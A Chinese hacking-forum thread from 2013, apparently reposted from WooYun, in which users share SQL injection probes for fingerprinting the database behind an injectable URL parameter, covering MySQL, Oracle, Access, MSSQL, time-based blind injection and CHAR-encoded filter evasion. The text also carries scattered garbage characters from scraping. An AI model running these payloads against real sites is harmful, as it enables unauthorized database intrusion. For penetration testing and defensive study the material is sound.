一个注射点如何最快速确认是什么类型数据库# h. x/ B1 |6 x) k! |5 K9 r
xsser (十根阳具有长短!!) | 2013-02-05 12:36+ S0 ^( V$ {& g
假设这么一个注射点:. f4 ^: F+ o+ `' B: B
show.html?id=2
/ M, C, X9 M6 C) mmysql:id=2 and version()>0
8 N2 I6 K% ?# ]! doracle:id=2 and '1'||'1'='11' ^0 C' ~) x: h6 v; @- V1 i
其他的欢迎补充+ X% |* T, d4 i( V3 j/ p
1#/ R$ Z6 p) y8 N- i
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
: U/ F: H+ i: o4 Q' a2 s, NAccess:6 g6 S. D* O: T/ Q' M$ q$ t' G, g
aNd aSc(cHr(97))=97
8 ? S' o7 D( D! ?! Dand exists(select id from MSysAccessObjects)+ S( j! a+ T' U
SQL Server:
% Y( F; h. K# D& iand exists(select id from sysobjects)
# e; F( g) a. g( s0 F2 Aand length(user)>09 e& F0 w3 R% n! |4 e
MySQL:! V# Q1 L9 \- m4 I- u I
and length(user())>04 A4 y) s# k* \8 M+ U+ F
2#
8 l n3 N5 _: }# ixsser (十根阳具有长短!!) | 2013-02-05 12:48
( A- T0 s) ]% r7 a$ w" a. g@upload 如果这些都不是呢…% F0 @' r/ g( g$ J2 g
3#
9 h5 S) N: x' p5 |! y8 eupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
) n( L3 c' L/ c@xsser 不快速的,延时注入1 K1 T6 W+ V2 `2 s. G
不知道这样写对不对
5 J8 r, j$ S4 e; Z# \2 Mmssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
! M/ `5 z6 x6 imysql:id=2 and select benchmark(1e8,current_date());) F% r. L% e' T3 I
4#% g0 R6 Z% ^: }5 O& R1 M
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:100 `: i, ] D1 x; s/ s- ~7 v
最快的貌似是看报错信息 m6 @" U( U: M* |, G3 o5 y
oracle error% {2 F, W- e$ @
mssql error
% T/ T9 K% T) ~7 O9 ]mysql error
; @0 r, g9 u8 W8 n" x- A5#
j8 n9 Y2 E* X9 lNimda (你们都是坏银~) | 2013-02-05 13:14) u7 P/ q. c6 W7 y$ T
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
. u9 P8 H2 p1 R4 ~6#
- \5 a- X, Z# o: _2 t3 k2 kupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
7 A" s, X8 E7 [ E' j9 o& \“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
7 l8 V/ k* w9 \! X8 t$ [2 a“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
7 M) E5 e, h0 e2 v( s4 u“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。+ k7 h4 l2 t! M. D
7#
3 `3 P: \! c0 ]_Evil (HackEnd) | 2013-02-05 13:33, N1 X' p" T w" Q0 A
PostgreSQL
, ~0 |7 i8 }5 F$ f( G3 j8#
! \3 C, a7 g) ^upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
; K Z0 O3 \; l切换编码 and 1=1
6 i( o( v+ Q1 F6 s5 _' Roracle:
' m4 b( ]" W! Z/ J2 T* v0 QCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)- U4 j, |9 C$ I/ e* w' w- r
mssql:
* T! F2 T! R6 {& DCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)# w! Q' [) m* M4 A, Y0 e2 M5 \* @
mysql:
! Z: b3 q- [- }# |/ b5 @! z8 dCHAR(97, 110, 100, 32, 49, 61, 49)1 E% ?- z1 d v+ M0 `7 m. K5 w, y
9#1 R2 ^- W/ e" U& p1 [5 G
xsser (十根阳具有长短!!) | 2013-02-05 14:31
2 T) B2 }7 h- Z6 V+ B2 }7 G@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
+ m/ @) X3 \/ O/ b1 |10#( p7 j1 K) k8 {4 W4 x4 R1 _
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
: p$ K6 q4 `& k2 l7 Y( v7 O@xsser 是奇葩数据库类型的么?
: O+ e; s8 C! t: o) q9 x根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:4 S5 D, Y/ V h' m0 W, ]
1.是否可以使用特定的函数来判断,该数据库特有的2 X4 l1 F+ c2 i' X: r% C& ]
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
5 @* w( `. Q! u9 ^0 X6 B, i$ V8 G5 ^3.是否可以编码查询. W. [4 P( i. l
4.是否显可以利用错信息$ I4 i3 m# V* [- u& y5 g2 f
5.是否存在数据库某些特性辅助判断
& ~4 S k8 Q3 U; ^4 |个人见解/ c/ y# m- q2 r3 e( i
11#
( M9 H, m' f- g, E/ l5 y( q小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:559 c6 u- M& k8 l# ~
已收藏,mssql可以直接看到错误提示的吧~
( n* S# R" c# k: g$ |1 \0 A: I" Q12#
& Y8 l' q2 `5 R/ H) P4 `; CPasser_by | 2013-02-05 15:09: W: r4 R i8 a1 u9 Z
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。6 R B/ @. d: t& N. ^ D
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对